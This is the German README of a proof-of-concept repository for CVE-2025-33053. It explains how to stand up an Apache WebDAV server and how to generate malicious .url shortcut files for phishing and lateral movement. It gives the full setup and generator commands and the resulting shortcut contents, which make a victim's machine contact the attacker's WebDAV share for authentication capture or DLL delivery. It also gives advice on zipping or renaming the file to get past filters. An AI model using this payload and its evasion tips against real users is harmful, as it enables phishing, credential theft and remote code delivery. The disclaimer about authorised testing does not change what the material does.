
CVE-2025-33053 Proof Of Concept (PoC)
Dieses Repository stellt Skripte bereit, um automatisch einen WebDAV-Server auf Ubuntu mit Apache2 bereitzustellen und bösartige .url-Verknüpfungsdateien für Phishing, Red Teaming oder Simulation von Lateral Movement zu generieren.
setup_webdav.sh – Bash-Skript zur Konfiguration von Apache2 + WebDAV.setup_webdav.py – Python-Version des obigen.gen_url.py – Python-Skript zum Generieren von .url-Verknüpfungsdateien mit UNC/WebDAV-Pfaden.README.md – Dokumentation.sudo)sudo bash setup_webdav.sh
Oder mit Python:
sudo python3 setup_webdav.py
Standardmäßig führt das Skript Folgendes aus:
/var/www/webdav erstellen.DAV und DAV_FS aktivieren.DavLockDB-Verzeichnis erstellen (um Apache-DAV-Sperrfehler zu vermeiden).📎 WebDAV-Pfad:
http://<your-ip>/webdav/
.url-Verknüpfungpython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
Dies erzeugt eine .url-Datei wie folgt:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Ein Klick auf diese Datei (in bestimmten Konfigurationen) kann dazu führen, dass das Zielsystem automatisch eine Verbindung zu Ihrem WebDAV-Server herstellt (Authentifizierung oder DLL-Lieferung).
sudo ufw allow 80
.url-Dateien werden je nach Konfiguration möglicherweise nicht wie erwartet ausgeführt:
.url zippen oder in .txt umbenennen, um Filter zu umgehen.Dieses Repository ist nur für Bildungszwecke und autorisierte Penetrationstests bestimmt.
Verwenden Sie diese Skripte nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.
Bei Fragen oder Anfragen zu ethischen Red-Teaming-Aktivitäten wenden Sie sich bitte über GitHub Issues.